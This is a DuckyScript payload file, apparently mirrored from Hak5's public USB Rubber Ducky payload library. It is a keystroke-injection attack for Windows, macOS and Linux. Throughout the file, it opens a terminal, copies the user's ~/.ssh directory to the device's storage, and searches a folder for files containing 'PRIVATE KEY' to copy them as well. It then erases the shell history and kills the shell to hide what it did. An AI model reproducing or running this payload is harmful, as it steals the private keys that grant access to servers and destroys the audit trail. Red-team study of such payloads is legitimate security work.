Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/ExfiltrateSSHKeys/payload.txt
2968 views
1
REM Title: ExfiltrateSSHKeys

2
REM Author: thomasgruebl

3
REM Target: Windows, macOS, Linux (partly functional)

4
REM Version: 1.0

5
REM Category: Exfiltration

6
REM Description: This payload performs an SSH key exfiltration attack by (1) 

7
REM              checking the default ssh key location ~/.ssh/ and (2) by performing a

8
REM              grep recursive pattern matching search for an SSH private key in a specified parent directory.

9


10
EXTENSION DETECT_READY

11
    REM VERSION 1.1

12
    REM AUTHOR: Korben

13


14
    REM_BLOCK DOCUMENTATION

15
        USAGE:

16
            Extension runs inline (here)

17
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

18
            boot delay

19


20
        TARGETS:

21
            Any system that reflects CAPSLOCK will detect minimum required delay

22
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms

23
    END_REM

24


25
    REM CONFIGURATION:

26
    DEFINE #RESPONSE_DELAY 25

27
    DEFINE #ITERATION_LIMIT 120

28


29
    VAR $C = 0

30
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))

31
        CAPSLOCK

32
        DELAY #RESPONSE_DELAY

33
        $C = ($C + 1)

34
    END_WHILE

35
    CAPSLOCK

36
END_EXTENSION

37


38
ATTACKMODE HID STORAGE

39


40
$_JITTER_ENABLED = TRUE

41


42
REM Define OS - Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE).

43
REM DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.

44
DEFINE #WINDOWS TRUE

45
DEFINE #MACOS FALSE

46
DEFINE #LINUX FALSE

47


48
REM Define Rubber Ducky Drive Label

49
DEFINE #DUCKY_DRIVE_LABEL DUCKY

50


51
REM Using "Desktop" as a sample directory

52
DEFINE #PARENT_DIR Desktop

53


54
IF_DEFINED_TRUE #MACOS

55
    DELAY 500

56
    GUI SPACE

57
    DELAY 500

58
    STRING terminal

59
    DELAY 50

60
    ENTER

61
    DELAY 100

62
    STRING cd

63
    DELAY 50

64
    ENTER

65
    DELAY 100

66
    

67
    REM Create exfiltration directory + add some extra delay to give the rubber ducky time to mount storage

68
    DELAY 2000

69
    STRING mkdir /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration

70
    DELAY 50

71
    ENTER

72
    DELAY 100

73
    

74
    REM Method 1: Copy ~/.ssh dir

75
    STRING cp .ssh/* /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration

76
    DELAY 50

77
    ENTER

78
    

79
    DELAY 1000

80
    

81
    REM Method 2: Recursively search a parent directory for an ssh key pattern

82
    STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;

83
    DELAY 50

84
    ENTER

85
    

86
    DELAY 3000

87
    

88
    REM Cleaning up

89
    

90
    REM 1. Flush shell history

91
    STRING history -p && rm -f .zsh_history && touch .zsh_history && kill -9 $$

92
    DELAY 50

93
    ENTER

94


95
    REM 2. Quit terminal

96
    DELAY 100

97
    GUI q

98


99
END_IF_DEFINED

100


101


102
IF_DEFINED_TRUE #WINDOWS

103


104
    REM Method 1: Copy ~/.ssh dir

105
    GUI r

106
    DELAY 500

107
    STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;

108
    STRING mkdir $vol':\'ssh_exfiltration\;

109
    STRING cp -r $env:USERPROFILE\.ssh\* $vol':\'ssh_exfiltration\; Start-Sleep -Seconds 0.5"

110
    DELAY 100

111
    ENTER

112
    DELAY 1000

113


114
    REM Method 2: Recursively search a parent directory for an ssh key pattern

115
    GUI r

116
    DELAY 100

117
    STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;

118
    STRING $matches=(findstr /MSPI 'PRIVATE KEY' $env:USERPROFILE\#PARENT_DIR\*);

119
    STRING $split_matches=$matches -split '`n';

120
    STRING foreach ($line in $split_matches) { cp $line $vol':\'ssh_exfiltration\ }"

121
    DELAY 100

122
    ENTER

123
    

124
    DELAY 500

125
END_IF_DEFINED

126


127


128
IF_DEFINED_TRUE #LINUX

129


130
    REM Needed longer delays on Ubuntu system while testing

131
    DELAY 3000

132
    CTRL-ALT t

133
    DELAY 3000

134


135
    STRINGLN cd

136
    DELAY 100

137


138
    REM identify user

139
    STRINGLN USER_NAME=$(whoami)

140
    DELAY 500

141
    

142
    STRINGLN mkdir /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration

143
    DELAY 100

144
    

145
    REM Method 1: Copy ~/.ssh dir

146
    STRINGLN cp .ssh/* /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration

147
    

148
    DELAY 1000

149
    

150
    REM Method 2: Recursively search a parent directory for an ssh key pattern

151
    STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;

152
    

153
    DELAY 3000

154
    

155
    REM Cleaning up

156


157
    REM 1. Flush shell history

158
    STRINGLN history -p && rm -f .bash_history && touch .bash_history && kill -9 $$

159
    DELAY 100

160


161
    REM 2. Quit terminal

162
    STRINGLN exit

163


164
END_IF_DEFINED

165


166